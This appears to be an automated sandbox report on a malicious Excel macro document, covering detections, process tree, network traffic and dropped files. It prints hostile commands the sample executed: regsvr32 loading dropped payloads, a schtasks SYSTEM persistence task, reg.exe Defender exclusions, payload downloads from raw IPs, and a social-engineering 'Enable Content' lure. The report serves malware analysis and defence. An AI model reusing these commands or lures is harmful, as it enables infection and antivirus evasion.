
Windows Analysis Report Claim-1368769328-09242021.xls

Overview

General Information

Sample Name:Claim-1368769328-09242021.xls
Analysis ID:489877
MD5:20b670d4bfd3e5480e7c27cba0c3e11e
SHA1:167b4de3034917861c38fa6812bd43d5a4ad6a18
SHA256:e2de3e8aee223f11eddfbb081fa78779b71ba5cb1d3ef657e9b8b3f16406b09a

Detection

Hidden Macro 4.0
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (drops PE files)
Sigma detected: Schedule system process
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Office process drops PE file
Writes to foreign memory regions
Uses cmd line tools excessively to alter registry or file data
Sigma detected: Microsoft Office Product Spawning Windows Shell
Allocates memory in foreign processes
Injects code into the Windows Explorer (explorer.exe)
Sigma detected: Regsvr32 Command Line Without DLL
Drops PE files to the user root directory
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Yara detected hidden Macro 4.0 in Excel
Uses schtasks.exe or at.exe to add and modify task schedules
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Downloads executable code via HTTP
Abnormal high CPU Usage
Drops files with a non-matching file extension (content does not match file extension)
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
PE file contains an invalid checksum
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Uses reg.exe to modify the Windows registry
Document contains embedded VBA macros
Drops PE files to the user directory
Dropped file seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1928 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • regsvr32.exe (PID: 2800 cmdline: regsvr32 -silent ..\Fiosa.der MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2792 cmdline: -silent ..\Fiosa.der MD5: 432BE6CF7311062633459EEF6B242FB5)
        • explorer.exe (PID: 2208 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
          • schtasks.exe (PID: 2004 cmdline: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn kxizfug /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 17:30 /ET 17:42 MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
    • regsvr32.exe (PID: 2016 cmdline: regsvr32 -silent ..\Fiosa1.der MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2244 cmdline: -silent ..\Fiosa1.der MD5: 432BE6CF7311062633459EEF6B242FB5)
        • explorer.exe (PID: 2180 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
    • regsvr32.exe (PID: 2524 cmdline: regsvr32 -silent ..\Fiosa2.der MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2212 cmdline: -silent ..\Fiosa2.der MD5: 432BE6CF7311062633459EEF6B242FB5)
        • explorer.exe (PID: 1704 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
  • regsvr32.exe (PID: 2032 cmdline: regsvr32.exe -s 'C:\Users\user\Fiosa.der' MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2600 cmdline: -s 'C:\Users\user\Fiosa.der' MD5: 432BE6CF7311062633459EEF6B242FB5)
      • explorer.exe (PID: 448 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
        • reg.exe (PID: 2076 cmdline: C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Autiufytlfbb' /d '0' MD5: 9D0B3066FE3D1FD345E86BC7BCCED9E4)
        • reg.exe (PID: 3048 cmdline: C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Nweouxwwcjwu' /d '0' MD5: 9D0B3066FE3D1FD345E86BC7BCCED9E4)
  • regsvr32.exe (PID: 244 cmdline: regsvr32.exe -s 'C:\Users\user\Fiosa.der' MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2860 cmdline: -s 'C:\Users\user\Fiosa.der' MD5: 432BE6CF7311062633459EEF6B242FB5)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
Claim-1368769328-09242021.xls | JoeSecurity_HiddenMacro | Yara detected hidden Macro 4.0 in Excel | Joe Security |

    Sigma Overview

    System Summary:

    Sigma detected: Microsoft Office Product Spawning Windows Shell
    Source: Process started; Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 -silent ..\Fiosa.der, CommandLine: regsvr32 -silent ..\Fiosa.der, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1928, ProcessCommandLine: regsvr32 -silent ..\Fiosa.der, ProcessId: 2800
    Sigma detected: Regsvr32 Command Line Without DLL
    Source: Process started; Author: Florian Roth: Data: Command: -silent ..\Fiosa.der, CommandLine: -silent ..\Fiosa.der, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: regsvr32 -silent ..\Fiosa.der, ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 2800, ProcessCommandLine: -silent ..\Fiosa.der, ProcessId: 2792

    Persistence and Installation Behavior:

    Sigma detected: Schedule system process
    Source: Process started; Author: Joe Security: Data: Command: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn kxizfug /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 17:30 /ET 17:42, CommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn kxizfug /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 17:30 /ET 17:42, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\SysWOW64\explorer.exe, ParentImage: C:\Windows\SysWOW64\explorer.exe, ParentProcessId: 2208, ProcessCommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn kxizfug /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 17:30 /ET 17:42, ProcessId: 2004

    Jbx Signature Overview

    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: Binary string: amstream.pdb source: explorer.exe, 00000006.00000003.497957177.0000000002791000.00000004.00000001.sdmp
    Source: Binary string: c:\chart-Green\Vowel-list\Place\935\Day.pdb source: regsvr32.exe, 00000005.00000002.497775026.000000001002A000.00000002.00020000.sdmp, explorer.exe, 00000006.00000003.500256751.0000000002791000.00000004.00000001.sdmp, regsvr32.exe, 00000009.00000002.552041458.000000001002A000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.563384856.000000001002A000.00000002.00020000.sdmp
    Source: C:\Windows\SysWOW64\regsvr32.exe; Code function: 5_2_1000AEB4 FindFirstFileW,FindNextFileW,5_2_1000AEB4
    Source: C:\Windows\SysWOW64\explorer.exe; Code function: 6_2_0008AEB4 FindFirstFileW,FindNextFileW,6_2_0008AEB4
    Source: C:\Windows\SysWOW64\explorer.exe; Code function: 14_2_0008AEB4 FindFirstFileW,FindNextFileW,14_2_0008AEB4
    Source: C:\Windows\SysWOW64\explorer.exe; Code function: 17_2_0008AEB4 FindFirstFileW,FindNextFileW,17_2_0008AEB4

    Software Vulnerabilities:

    Document exploit detected (drops PE files)
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: 44463.7272820602[1].dat.0.dr
    Document exploit detected (process start blacklist hit)
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: C:\Windows\System32\regsvr32.exe
    Document exploit detected (UrlDownloadToFile)
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
    Source: global traffic; TCP traffic: 192.168.2.22:49167 -> 190.14.37.173:80
    Source: global traffic; HTTP traffic detected: HTTP/1.1 200 OK Server: nginx Date: Fri, 24 Sep 2021 15:26:58 GMT Content-Type: application/octet-stream Content-Length: 495616 Connection: keep-alive X-Powered-By: PHP/5.4.16 Accept-Ranges: bytes Expires: 0 Cache-Control: no-cache, no-store, must-revalidate Content-Disposition: attachment; filename="44463.7272820602.dat"
    Source: global traffic; HTTP traffic detected: HTTP/1.1 200 OK Server: nginx Date: Fri, 24 Sep 2021 15:27:03 GMT Content-Type: application/octet-stream Content-Length: 495616 Connection: keep-alive X-Powered-By: PHP/5.4.16 Accept-Ranges: bytes Expires: 0 Cache-Control: no-cache, no-store, must-revalidate Content-Disposition: attachment; filename="44463.7272820602.dat"
    Source: global traffic; HTTP traffic detected: HTTP/1.1 200 OK Server: nginx Date: Fri, 24 Sep 2021 15:27:14 GMT Content-Type: application/octet-stream Content-Length: 495616 Connection: keep-alive X-Powered-By: PHP/5.4.16 Accept-Ranges: bytes Expires: 0 Cache-Control: no-cache, no-store, must-revalidate Content-Disposition: attachment; filename="44463.7272820602.dat"
    Source: global traffic; HTTP traffic detected: GET /44463.7272820602.dat HTTP/1.1 Accept: */* UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 190.14.37.173 Connection: Keep-Alive
    Source: global traffic; HTTP traffic detected: GET /44463.7272820602.dat HTTP/1.1 Accept: */* UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 111.90.148.104 Connection: Keep-Alive
    Source: global traffic; HTTP traffic detected: GET /44463.7272820602.dat HTTP/1.1 Accept: */* UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 51.89.115.111 Connection: Keep-Alive
    Source: unknown; TCP traffic detected without corresponding DNS query: 190.14.37.173
    Source: regsvr32.exe, 00000005.00000002.497205948.0000000002260000.00000002.00020000.sdmp, explorer.exe, 00000006.00000002.870043428.00000000022C0000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.551601512.0000000002360000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.560498474.0000000000F60000.00000002.00020000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
    Source: regsvr32.exe, 00000003.00000002.498695724.0000000001D80000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.496898931.0000000000A90000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.553114227.0000000001DA0000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.551291821.00000000008F0000.00000002.00020000.sdmp, regsvr32.exe, 0000000B.00000002.564152659.00000000009B0000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.558923277.0000000000BF0000.00000002.00020000.sdmp; String found in binary or memory: http://servername/isapibackend.dll
    Source: regsvr32.exe, 00000005.00000002.497205948.0000000002260000.00000002.00020000.sdmp, explorer.exe, 00000006.00000002.870043428.00000000022C0000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.551601512.0000000002360000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.560498474.0000000000F60000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000002.553204849.0000000002120000.00000002.00020000.sdmp; String found in binary or memory: http://www.%s.comPA
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.7272820602[1].dat

    System Summary:

    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
    Source: Screenshot number: 4; Screenshot OCR: ENABLE EDITING" button to unlock the document downloaded from the Internet. 38 n ^l: i ffmn i a ml
    Source: Screenshot number: 4; Screenshot OCR: Document is Protected 18 19 20 21 VIEW COMPLETED DOCUMENT 22 23 24 25 26 27 :: THE STEPS
    Source: Document image extraction number: 0; Screenshot OCR: ENABLE EDITING" button to unlock the document downloaded from the Internet. 2. Click on "ENABLE CON
    Source: Document image extraction number: 0; Screenshot OCR: Document is Protected VIEW COMPLE ILD DOCUMENT THE STEPS ARE REQUIRED TO FULLY DECRYPT THE DOCUMEN
    Source: Document image extraction number: 0; Screenshot OCR: ENABLE CONTENT" button to perform Microsoft Exel Decryption Core to start the decryption of the doc
    Source: Document image extraction number: 1; Screenshot OCR: ENABLE EDITING" button to unlock the document downloaded from the Internet. 2. Click on "ENABLE CON
    Source: Document image extraction number: 1; Screenshot OCR: Document is Protected VIEW COMPLETED DOCUMENT THE STEPS ARE REQUIRED TO FULLY DECRYPT THE DOCUMENT
    Source: Document image extraction number: 1; Screenshot OCR: ENABLE CONTENT" button to perform Microsoft Exel Decryption Core to start the decryption of the doc
    Office process drops PE file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.7272820602[2].dat
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.7272820602[1].dat
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.7272820602[3].dat
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\Fiosa2.der
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\Fiosa.der
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\Fiosa1.der
    Source: Claim-1368769328-09242021.xlsOLE, VBA macro line: Sub auto_open()
    Source: Claim-1368769328-09242021.xlsOLE, VBA macro line: Sub auto_close()
    Source: Claim-1368769328-09242021.xlsOLE, VBA macro line: Private m_openAlreadyRan As Boolean
    Source: Claim-1368769328-09242021.xlsOLE, VBA macro line: Private Sub saWorkbook_Opensa()
    Source: Claim-1368769328-09242021.xlsOLE, VBA macro line: m_openAlreadyRan = True
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_1000C6C0 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose,5_2_1000C6C0
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_1000CB77 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary,5_2_1000CB77
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess Stats: CPU usage > 98%
    Source: Fiosa2.der.23.drStatic PE information: No import functions for PE file found
    Source: Fiosa.der.6.drStatic PE information: No import functions for PE file found
    Source: Fiosa.der.17.drStatic PE information: No import functions for PE file found
    Source: Fiosa1.der.14.drStatic PE information: No import functions for PE file found
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Autiufytlfbb' /d '0'
    Source: Claim-1368769328-09242021.xlsOLE indicator, VBA macros: true
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.7272820602[1].dat 09665AC0C492BE214A6AE089600B01B3517AE6894F735764B13F71293E035827
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.7272820602[2].dat 09665AC0C492BE214A6AE089600B01B3517AE6894F735764B13F71293E035827
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.7272820602[3].dat 09665AC0C492BE214A6AE089600B01B3517AE6894F735764B13F71293E035827
    Source: Joe Sandbox ViewDropped File: C:\Users\user\Fiosa.der 4F5DDF752A4621D639C402228BBA62F75450D0E07BEEB36F971F6638C462EA38
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76E90000 page execute and read and write
    Source: 44463.7272820602[1].dat.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: Fiosa.der.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: 44463.7272820602[2].dat.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: Fiosa1.der.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: 44463.7272820602[3].dat.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: Fiosa2.der.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\System32\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Windows\System32\reg.exeConsole Write: The operation completed successfully.
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Fiosa.der
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa.der
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Fiosa1.der
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn kxizfug /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 17:30 /ET 17:42
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa1.der
    Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Fiosa.der'
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Fiosa.der'
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Fiosa2.der
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa2.der
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Autiufytlfbb' /d '0'
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Nweouxwwcjwu' /d '0'
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Fiosa.der'
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Fiosa.der'
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Application Data\Microsoft\Forms
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD0C5.tmp
    Source: classification engineClassification label: mal100.expl.evad.winXLS@33/11@0/3
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_1000D523 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket,5_2_1000D523
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.ini
    Source: Claim-1368769328-09242021.xlsOLE indicator, Workbook stream: true
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_1000ABA3 CreateToolhelp32Snapshot,memset,Process32First,Process32Next,CloseHandle,5_2_1000ABA3
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \BaseNamedObjects\{60B8EB82-998D-4F4F-A497-6092A6C76F18}
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{2F8DB037-CF7B-4A1C-9C04-5425A37EBC9B}
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \BaseNamedObjects\{37AC520D-E6F7-4F1E-8435-C1F504A7E422}
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\{37AC520D-E6F7-4F1E-8435-C1F504A7E422}
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \BaseNamedObjects\Global\{60B8EB82-998D-4F4F-A497-6092A6C76F18}
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\{2F8DB037-CF7B-4A1C-9C04-5425A37EBC9B}
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_1000A51A FindResourceA,5_2_1000A51A
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEWindow found: window name: SysTabControl32
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: Binary string: amstream.pdb source: explorer.exe, 00000006.00000003.497957177.0000000002791000.00000004.00000001.sdmp
    Source: Binary string: c:\chart-Green\Vowel-list\Place\935\Day.pdb source: regsvr32.exe, 00000005.00000002.497775026.000000001002A000.00000002.00020000.sdmp, explorer.exe, 00000006.00000003.500256751.0000000002791000.00000004.00000001.sdmp, regsvr32.exe, 00000009.00000002.552041458.000000001002A000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.563384856.000000001002A000.00000002.00020000.sdmp
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_1002202C push es; ret 5_2_1002202D
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_10021C96 pushad ; iretd 5_2_10021C9E
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_10026CE9 push dword ptr [esp+eax*4+38h]; iretd 5_2_10026CF4
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_10026105 push edi; ret 5_2_1002611C
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_1002514B pushad ; iretd 5_2_1002514C
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_10027D58 pushfd ; ret 5_2_10027DEC
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_10027679 push es; ret 5_2_100276FB
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_10023B27 push es; retf 5_2_10023BA0
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_10022F6D push eax; retf 5_2_10022F97
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_10022FAA push eax; retf 5_2_10022F97
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_0009A00E push ebx; ret 6_2_0009A00F
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_0009D485 push FFFFFF8Ah; iretd 6_2_0009D50E
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_0009D4B6 push FFFFFF8Ah; iretd 6_2_0009D50E
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_00099D5C push cs; iretd 6_2_00099E32
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_00099E5E push cs; iretd 6_2_00099E32
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_0009BB29 push esi; iretd 6_2_0009BB2E
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_1002202C push es; ret 9_2_1002202D
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_10021C96 pushad ; iretd 9_2_10021C9E
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_10026CE9 push dword ptr [esp+eax*4+38h]; iretd 9_2_10026CF4
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_10026105 push edi; ret 9_2_1002611C
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_1002514B pushad ; iretd 9_2_1002514C
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_10027D58 pushfd ; ret 9_2_10027DEC
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_10027679 push es; ret 9_2_100276FB
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_10023B27 push es; retf 9_2_10023BA0
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_10022F6D push eax; retf 9_2_10022F97
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_10022FAA push eax; retf 9_2_10022F97
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_1002202C push es; ret 12_2_1002202D
